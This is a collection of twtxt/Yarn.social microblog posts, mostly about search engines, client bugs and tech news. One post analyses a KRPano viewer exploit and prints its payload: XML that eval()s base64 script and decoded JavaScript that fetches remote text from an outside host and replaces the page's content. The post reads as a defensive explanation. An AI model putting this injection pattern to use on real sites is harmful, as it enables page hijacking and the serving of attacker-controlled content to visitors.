@bender@twtxt.net Yes, you right. But is premium for more than that.
I use a feature I love a lot: customising different searches with different themes or links.
It’s easy to understand with an example. I have a search with the name “Django”. I set sources: Django documentation, stack overflow, topic “programming” and so on. It’s very quick to find Django solutions.
I also have another way to find my stuff: search my blog and repositories.
I had problems paying for the first mouths, now it’s a working tool for me.
@andros@twtxt.andros.dev what makes Kagi “the best search engine”? It is premium, alright. Allegedly you don’t get ads, but pay up-front for it, monthly.
I am very agree with the article. For me, Kagi is the best search engine. A premium experience.
@thecanine@twtxt.net Yeah this is where I think all the hype really falls down. It’s all just a really really expensive search engine and auto-complete 🤦♂️ That’s it!
I just fixed a bug in tt’s reply to parent feature. Previously, when the message tree looked like the following
Message
├╴Reply 1
│ └╴Subreply
└╴Reply 2
and “Reply 2” was selected, pressing A
to reply to the parent should have picked “Message”. However, a reply to “Reply 2” was composed instead. The reason was a precausiously introduced safety guard to abort the parent search which stopped at “Subreply”, because its subject didn’t match “Reply 2”’s. It was originally intended to abort on a completely different message conversation root. Just in case. Turns out that this thoght was flawed.
Fixing bugs by only removing code is always cool. :-)
/ME slipping a note under @klaxzy@klaxzy.net’s keyboard.
Note: “You should check https://marginalia-search.com/ I bet you’ll love it.”
Oddly, in defense of Google keeping Chrome
As much as I’m a fan of breaking up Google, I’m not entirely sure carving Chrome out of Google without a further plan for what happens to the browser is a great idea. I mean, Google is bad, but but things could be so, so much worse. OpenAI would be interested in buying Google’s Chrome if antitrust enforcers are successful in forcing the Alphabet unit to sell the popular web browser as part of a bid to restore competition in search, an OpenAI execu … ⌘ Read more
Hmmm there’s a bug somewhere in the way I’m ingesting archived feeds 🤔
sqlite> select * from twts where content like 'The web is such garbage these days%';
hash = 37sjhla
feed_url = https://twtxt.net/user/prologic/twtxt.txt/1
content = The web is such garbage these days 😔 Or is it the garbage search engines? 🤔
created = 2024-11-14T01:53:46Z
created_dt = 2024-11-14 01:53:46
subject = #37sjhla
mentions = []
tags = []
links = []
sqlite>
Timeline of Evolution of Twtxt/Yarn.social:
- 2016 – Twtxt created by John Downey: plain text + HTTP = minimalist microblogging
- 2017–2019 – Community builds CLI tools, but adoption remains niche
- 2020 – Yarn.social launched by @prologic@twtxt.net with federation, threading, UI
- 2021–2023 – Pods sync, user mentions, blocking, search, and media support added
- 2024+ – Yarn.social becomes the reference Twtxt platform, with active federated pods
Dam the search here is sooo good now 😅
Windows Recall returns, and its companion feature does not keep data on-device
Remember Windows Recall, the Windows feature that would take a screenshot of your desktop every three seconds, stored them in a database, and then let you search through them at later dates? The feature has been hobbled by implementation problems, security issues, and privacy troubles, and has been released in preview and pulled since its original unveiling. Well, it’s back in … ⌘ Read more
Anyway. this was a good use for search btw. I couldn’t find my Twt, so I just quickly searched for it, snap, bingo I found it in a snap! 🫰
@prologic@twtxt.net, from IRC:
- Saving preferences is failing. Specifically trying to save “Open Links” on the same window. For sure it isn’t happening. Check errors on browser’s console.
- Search results pagination is broken. Search for “twtxt.net” and see it. Also, picking oldest/newest makes no difference on that search query.
@prologic@twtxt.net I can live without highlights. Actually, I prefer not to have them. A good search is all I want.
Search syntax appears to be:
hello
"hello world"
hello AND world
hello OR world
hello NOT world
"this is a phrase"
@prologic@twtxt.net pretty neat, search actually works now!
@lyse@lyse.isobeef.org I’m open to other suggestions 🤣 But hopefully both adding the additional prompt, not allowing it to enter shell history and removing from my shell history prevents me from doing such silly things in haste by pressing ^R
and using fuzzy search which if you type fast you sometimes get wrong 😑
FYI: I’ve re-opened up search for anonymous use. So things like this now work without having to have an account on this pod or login. 👌 #search #twtxt
@prologic@twtxt.net If it develops, and I’m not saying it will happen soon, perhaps Yarn could be connected as an additional node. Implementation would not be difficult for any client or software. It will not only be a backup of twtxt, but it will be the source for search, discovery and network health.
Google, DuckDuckGo massively expand “AI” search results
Clearly, online search isn’t bad enough yet, so Google is intensifying its efforts to continue speedrunning the downfall of Google Search. They’ve announced they’re going to show even more “AI”-generated answers in Search results, to more people. Today, we’re sharing that we’ve launched Gemini 2.0 for AI Overviews in the U.S. to help with harder questions, starting with coding, advanced math and multimodal queries, with mor … ⌘ Read more
looks good to me!
About alice’s hash, using SHA256, I get 96473b4f
or 96473B4F
for the last 8 characters. I’ll add it as an implementation example.
The idea of including it besides the follow URL is to avoid calculating it every time we load the file (assuming the client did that correctly), and helps to track replies across the file with a simple search.
Also, watching your example I’m thinking now that instead of {url=96473B4F,id=1}
which is ambiguous of which URL we are referring to, it could be something like:
{reply_to=[URL_HASH]_[TWT_ID]}
/ {reply_to=96473B4F_1}
That way, the ‘full twt ID’ could be 96473B4F_1
.
@prologic@twtxt.net Of course you don’t notice it when yarnd only shows at most the last n messages of a feed. As an example, check out mckinley’s message from 2023-01-09T22:42:37Z. It has “[Scheduled][Scheduled][Scheduled]“… in it. This text in square brackets is repeated numerous times. If you search his feed for closing square bracket followed by an opening square bracket (][
) you will find a bunch more of these. It goes without question he never typed that in his feed. My client saves each twt hash I’ve explicitly marked read. A few days ago, I got plenty of apparently years old, yet suddenly unread messages. Each and every single one of them containing this repeated bracketed text thing. The only conclusion is that something messed up the feed again.
@prologic@twtxt.net @xuu@txt.sour.is There:
Just search for ][
in https://twtxt.net/user/mckinley/twtxt.txt and you’ll see.
reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt
file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:
- (810) bingbot
- (641) Googlebot
- (624) http://www.google.com/bot.html
- (545) DotBot
- (290) GPTBot
- (106) SemrushBot
- (84) AhrefsBot
- (62) MJ12bot
- (60) BLEXBot
- (55) wpbot
- (37) Amazonbot
- (28) YandexBot
- (22) ClaudeBot
- (19) AwarioBot
- (14) https://domainsbot.com/pandalytics
- (9) https://serpstatbot.com
- (6) t3versionsBot
- (6) archive.org_bot
- (6) Applebot
- (5) http://search.msn.com/msnbot.htm
- (4) http://www.googlebot.com/bot.html
- (4) Googlebot-Mobile
- (4) DuckDuckGo-Favicons-Bot
- (3) https://turnitin.com/robot/crawlerinfo.html
- (3) YandexNews
- (3) ImagesiftBot
- (2) Qwantify-prod
- (1) http://www.google.com/adsbot.html
- (1) http://gais.cs.ccu.edu.tw/robot.php
- (1) YaK
- (1) WBSearchBot
- (1) DataForSeoBot
i have placed some middleware to reject these for now but it is not a full proof solution.
Well, that’s another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.
Reading “Man’s search for meaning” by Viktor E. Frankl
Unit Circle
⌘ Read more
@slashdot@feeds.twtxt.net Who the F+++ still uses goo’s search engine anyway xD Shout out to all my homies hosting a Searx instance 😂🤘
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more
Google Begins Requiring JavaScript For Google Search
Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the over … ⌘ Read more
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml
parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
@lime360@lime360.nekoweb.org Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time 😅 Sorry for the inconvenience, I just can’t afford to run the search engine right now on the remaining two nodes 😢😢
@prologic@twtxt.net uhhh what happened to search.twtxt.net
nice! would you mind elaborating a bit?
Is that the scientific method?
I couldn’t find anything related when I searched for it.
@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but haven’t since then. I don’t remember which ones, but they were easy to find with web searches.
@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, an search API
Remembered about one ISP which disallow IRC stuff on his servers. By searching i found what it’s many ISP’s which equals IRC to proxy and doorways. This is unfair!
clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi
… it even shows @sorenpeter@darch.dk’s article from 2020 in search results
@prologic@twtxt.net I cannot… believe… It took me a “Single Search Query” to get HOOKED!! 🤩 Bonus: tried it from terminal too and it works just 👌